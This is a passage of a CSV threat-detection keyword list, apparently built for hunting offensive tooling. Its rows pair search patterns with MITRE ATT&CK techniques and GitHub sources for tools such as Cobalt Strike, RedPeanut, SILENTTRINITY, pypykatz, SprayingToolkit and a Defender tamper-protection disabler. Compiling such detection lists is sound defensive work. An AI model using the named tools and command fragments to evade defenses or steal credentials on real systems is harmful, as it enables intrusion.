Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","59927" "*Spawning registry with TrustedInstaller privileges to Disable 'RealtimeMonitoring' regkey*",".{0,1000}Spawning\sregistry\swith\sTrustedInstaller\sprivileges\sto\sDisable\s\'RealtimeMonitoring\'\sregkey.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","59928" "*Spawning registry with TrustedInstaller privileges to Enable 'TamperProtection' regkey*",".{0,1000}Spawning\sregistry\swith\sTrustedInstaller\sprivileges\sto\sEnable\s\'TamperProtection\'\sregkey.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","59929" "*SpawnPPIDAgentManager*",".{0,1000}SpawnPPIDAgentManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59930" "*SpawnShellcode.cs*",".{0,1000}SpawnShellcode\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59931" "*SpawnShellcodeManager*",".{0,1000}SpawnShellcodeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59932" "*spawnT2W(*",".{0,1000}spawnT2W\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#content","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","59933" "*SpawnTheThing(*",".{0,1000}SpawnTheThing\(.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","59934" "*spawnto *.exe",".{0,1000}spawnto\s.{0,1000}\.exe","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59935" "*spawnto */path *",".{0,1000}spawnto\s.{0,1000}\/path\s.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","59936" "*spawnto_x64 -Application *",".{0,1000}spawnto_x64\s\-Application\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","59937" "*'spawnto_x64'*",".{0,1000}\'spawnto_x64\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","59938" "*spawnto_x64.py*",".{0,1000}spawnto_x64\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","59939" "*spawnto_x86 -Application*",".{0,1000}spawnto_x86\s\-Application.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","59940" 
"*'spawnto_x86'*",".{0,1000}\'spawnto_x86\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","59941" "*spawnto_x86.py*",".{0,1000}spawnto_x86\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - 
T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","59942" "*specialtokengroupprivs.py*",".{0,1000}specialtokengroupprivs\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","59943" "*Specified user is a Domain Admin. Use the -Force switch to override*",".{0,1000}Specified\suser\sis\sa\sDomain\sAdmin\.\sUse\sthe\s\-Force\sswitch\sto\soverride.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","59944" "*Specified user is a Enterprise Admin. Use the -Force switch to override*",".{0,1000}Specified\suser\sis\sa\sEnterprise\sAdmin\.\sUse\sthe\s\-Force\sswitch\sto\soverride.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","59945" "*Specify domain for enumeration*",".{0,1000}Specify\sdomain\sfor\senumeration.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","59946" "*Specify -instanceid 1337*Specify -source 'Persistence*",".{0,1000}Specify\s\-instanceid\s1337.{0,1000}Specify\s\-source\s\'Persistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","59947" "*SpecterOps/Nemesis*",".{0,1000}SpecterOps\/Nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","59948" "*Specula C2*",".{0,1000}Specula\sC2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","59949" "*SpeculaC2*",".{0,1000}SpeculaC2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","59950" "*Spel_RCE_Bash_EXP.py*",".{0,1000}Spel_RCE_Bash_EXP\.py.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59951" "*Spel_RCE_POC.py*",".{0,1000}Spel_RCE_POC\.py.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day 
Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","","N/A","","","","59952" "*spiderfoot -l 127.0.0.1:*",".{0,1000}spiderfoot\s\-l\s127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59953" "*spiderfoot-cli -s http*",".{0,1000}spiderfoot\-cli\s\-s\shttp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59954" "*-SpiderFoot-correlations.csv*",".{0,1000}\-SpiderFoot\-correlations\.csv.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","59955" "*spiderfoot-master*",".{0,1000}spiderfoot\-master.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","59956" "*SpiderLabs/DoHC2*",".{0,1000}SpiderLabs\/DoHC2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the 
ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","59957" "*SpiderLabs/Responder*",".{0,1000}SpiderLabs\/Responder.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","59958" "*spindrift.py *--target *",".{0,1000}spindrift\.py\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","59959" "*spindrift.py --domain*",".{0,1000}spindrift\.py\s\-\-domain.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","59960" "*Spins up catspin using Api Gateway proxy*",".{0,1000}Spins\sup\scatspin\susing\sApi\sGateway\sproxy.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","59961" "*Splinter-RAT [Aardvark] vers 1.0 Developed by @Carpenter1010*",".{0,1000}Splinter\-RAT\s\[Aardvark\]\svers\s1\.0\sDeveloped\sby\s\@Carpenter1010.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","59970" "*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*",".{0,1000}sploitus\.com\/exploit\?id\=6C1081C5\-7938\-5E83\-9079\-719C1B071FB5.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z","59971" "*splunk/upload_app_exec/*",".{0,1000}splunk\/upload_app_exec\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59972" "*splunk_whisperer.py*",".{0,1000}splunk_whisperer\.py.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","59973" "*splunk_whisperer-master*",".{0,1000}splunk_whisperer\-master.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","59974" "*SplunkWhisperer2-master*",".{0,1000}SplunkWhisperer2\-master.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","59975" "*-spn * -clsid * -shadowcred*",".{0,1000}\-spn\s.{0,1000}\s\-clsid\s.{0,1000}\s\-shadowcred.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","59976" "*SPN:SharpRoast.exe*",".{0,1000}SPN\:SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","59977" "*spnroast_*.txt*",".{0,1000}spnroast_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","59978" "*Spoof extensions/Spoofer.exe*",".{0,1000}Spoof\sextensions\/Spoofer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","59979" "*spoof.py *.dll*",".{0,1000}spoof\.py\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","0","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","59980" "*spoof/llmnr/llmnr_response*",".{0,1000}spoof\/llmnr\/llmnr_response.{0,1000}","offensive_tool_keyword","metasploit","llmnr spoofing used by Dispossessor ransomware group","T1001 - T1021 - T1024 